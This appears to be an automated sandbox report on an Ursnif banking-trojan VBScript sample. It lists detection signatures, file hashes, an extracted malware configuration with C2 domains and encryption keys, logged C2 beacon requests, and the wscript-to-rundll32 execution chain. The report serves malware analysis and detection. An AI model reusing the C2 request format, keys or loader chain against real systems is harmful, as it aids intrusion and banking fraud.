Windows Analysis Report v8MaHZpVOY2L.vbs

Overview

General Information

Sample Name: v8MaHZpVOY2L.vbs
Analysis ID: 458149
MD5: 5d6eee678e2f66bef8885b3b3064db81
SHA1: 4f64fdc2929e29ad8c001a0c3d8ad02f175f68d8
SHA256: 9889b06c39eab474b06205ab27007447ee6e7eebdb8ac2e55b31eaacdcde8a49
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Hooks registry keys query functions (used to hide registry keys)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://gtr.antoinfer.com/rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K Avira URL Cloud: Label: malware
Source: http://app.flashgameo.at/G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000001C.00000003.600911240.0000000004280000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "9LNhwxYlD34jdxVCbRuhkLxCR5ltHK+f92WD9cMttCYYbvrL4wv6YJiUl9MHov+IIcYUbYs1JFt6ciXd5FdaoSi3eR2WJz3cKGQV77NysByS4hxLa5EsHQS3R7uDA4zT8rf/1GgZx5Tp5bLYUv+OvwzR6K0bcxr8BVKOhWasMt87tt2F/oc67dLXbG6cOVSb9XDEKm1AD4WNvDG5s+8oRXKyXYNyBvqnTooYX8iM4Wq8R9SXbFoTevuBBwCGXRu7hbWXoRZP6gXfoUqzaH99rq2BGpO8MD8zNQdBO2RxQLO9iayjRA/+oZ0IQHzkfaTa+mDCPgDQii50gVawYZtAvTBYJQQyRdCtVbewt3iRduY=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "eTV3coItEryBMTIK", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "3"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 12% Perma Link
Source: app.flashgameo.at Virustotal: Detection: 11% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\beneficial.odt ReversingLabs: Detection: 35%
Multi AV Scanner detection for submitted file
Source: v8MaHZpVOY2L.vbs Virustotal: Detection: 34% Perma Link
Source: v8MaHZpVOY2L.vbs ReversingLabs: Detection: 13%

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04444CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 28_2_04444CEA
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdbXP@L source: powershell.exe, 00000025.00000002.750257715.000001D6861CE000.00000004.00000001.sdmp
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000027.00000002.731260483.0000015F83160000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.pdb8 source: powershell.exe, 00000025.00000002.750151124.000001D68618E000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdb source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp
Source: Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: wscript.exe, 00000002.00000003.406245520.00000294B943D000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.736255174.0000000070329000.00000002.00020000.sdmp, beneficial.odt.2.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kf2dbsxa\kf2dbsxa.pdbXP@L source: powershell.exe, 00000025.00000002.744104497.000001D6848CF000.00000004.00000001.sdmp

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49744 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49745 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49745 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49746 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49747 -> 185.228.233.17:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITOS-ASRU ITOS-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: POST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: GET /rlxVSKuL/2_2BsetYpYqkPa4ojd3ueIs/LptIHuoMYe/oePXHReeS37D5yQcj/NVMKXI44Lp_2/FBXX9_2Bb20/jKEI_2Bgs2rJZa/uDvTh6TWLh5vgJvzY3DD5/t9e4NaZqHQBjkiny/8qc8N7JBB_2BWAp/j62HsMJoXm5nFzMKnH/PUlPiGqu_/2BwmGwUAtbFIfQPHyxkA/s1QKb9NHLGrKFNlhNvS/ugnsSzKyJjdaSAXMmE7nnq/w4loggPNqDjSA/3u_2Fu4X/o8m8kFpFCtqZfzxEWO6Thbv/o4OD2d7LJV/azLj6lFTEoSfLl1Au/Hx1vAUoJagaa/8_2Faxj3Ge9/KUQqi9K HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /_2FPQI_2BhXbN/xv2lU8Kt/H_2BdMo7RP11B49_2B_2F0p/qZonO_2BsX/r_2FXf13KB9QuPtJ8/fzPhqB_2BKd8/L6vOPdmyzVt/cOhxQgVRfJCJOJ/2LqjFunTc58GKXt_2Fach/MI8acKZfKve2lDEv/O3RXxaeZ1jmnB_2/BM9wKTm5ezPhIbAkjC/N5BuSzoVY/tbmUpCJD8R6uccF9y9i6/TVII1EazLMdbmsastBa/0EuLYCoDqjXXpV7R0KscZQ/pLkoykG5NbmPg/94pI1TlM/k2tyuNpa_2FFDzXBR3wx_2B/y8INZfX1Fd/ksZUQaKi9Q7CR7rUB/b0tO0OTt2nw2/3iZt0Tq5yV/igZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /kOsDeCoa3YCbt/7unBBLww/wK2a4bs_2FEI4QMN91PzB77/bz4N4g_2FJ/HycIy3_2F8zj3jBC0/8_2FW3BGV1mS/XPDK9f9Rzez/BpS5UyR9Bg2zMd/a_2FnA03_2FZhf2fI92gT/6Pq3nEyBr7Wl1SSB/zAmSQjqWqXfIY_2/Byf0kTcmXemOm2EfN6/CRY7WM32g/emO80EseOb_2BSjCXMeG/FctE3VztzFEWZR0a5bZ/yCEZcBPGdi592UoFqj3gHf/9Ntn0rghQ_2Bu/Ix9av6MS/M_2FOYWbdmDkx6Xj7Ngd9FO/n_2Fp4ojwk/l2YrsEsA6NU73tN6Q/Nzovizi1/wIzBsN1hETht/VNa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /G_2BtrdeOa30tm0G9t89_/2B2JiDdQSL9x3Q_2/FX260sNBDITgyeI/BpdcrPIFomZZkoPh3u/AGrnxiUWf/rTd4z_2FOnqpP22ZfzjV/mxG1oweqZWhdtbLmZAx/FWCeM7DpHnLSREoZzBO0OT/Gl1f2t9tfS_2B/ptWI3fqD/FvNQq67awVJw_2B1kVzh8_2/BYbRBRJlE6/co1z79C1RuybQlL62/8psEOCbjHHAG/PdRgwv9Npt6/R_2FEA3He8vvaK/f3TQbAUz8vl1HZbrGMu9B/8naEcnAAoMKIKsYO/rVxHWtDfSOnGKso/2ZAFkBCgt5yBJA/G HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: unknown HTTP traffic detected: POST /x7RHILsUu13RNWdAgcyIG/qtXPZ5mShxWyId8A/aqzFvUR1vpmX8Up/q_2B2EdTfKMNCz0qxF/_2FPDHq0L/LUAKCoi5Kv4k92FCS9c4/5pNcQF7C6KYMZBsUSDt/KFidT5iQrYQJ8LRP_2FoLY/f_2B88YT7woyk/KKJVXmPv/vF_2FE_2Fvc1X20QJ8r0Wn_/2BzNsjc_2F/YMdyw7a8HJLKOf2JR/adM5VRnv5AOV/eVROMbVITYu/4QdgxMF4kpaBK6/UL3JxZ6B_2FLQEdWMX_2B/oDqnX_2BCDatYw9I/KVGr3LtJ92s34dn/eT_2Bba67PTBBLkoO/1xww0J HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000025.00000002.732660461.000001D681EC1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000025.00000002.734794410.000001D6820CF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000025.00000002.750353204.000001D691F1D000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04444CEA CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 28_2_04444CEA

System Summary:

barindex
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E192C NtMapViewOfSection, 28_2_702E192C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E1E74 SetThreadPriority,NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 28_2_702E1E74
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E12CE NtCreateSection,memset, 28_2_702E12CE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E2495 NtQueryVirtualMemory, 28_2_702E2495
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_044425E5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 28_2_044425E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04448055 NtQueryVirtualMemory, 28_2_04448055
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_702E2274 28_2_702E2274
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04447E30 28_2_04447E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04446680 28_2_04446680
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_0444175B 28_2_0444175B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_70322400 28_2_70322400
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_7030A1AC 28_2_7030A1AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_703263D0 28_2_703263D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_703055C0 28_2_703055C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_703047E0 28_2_703047E0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 702FA3B0 appears 34 times
Java / VBScript file with very long strings (likely obfuscated code)
Source: v8MaHZpVOY2L.vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winVBS@14/8@6/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 28_2_04446244 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 28_2_04446244
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20210802 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\adobe.url Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Source: v8MaHZpVOY2L.vbs Virustotal: Detection: 34%
Source: v8MaHZpVOY2L.vbs ReversingLabs: Detection: 13%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\v8MaHZpVOY2L.vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
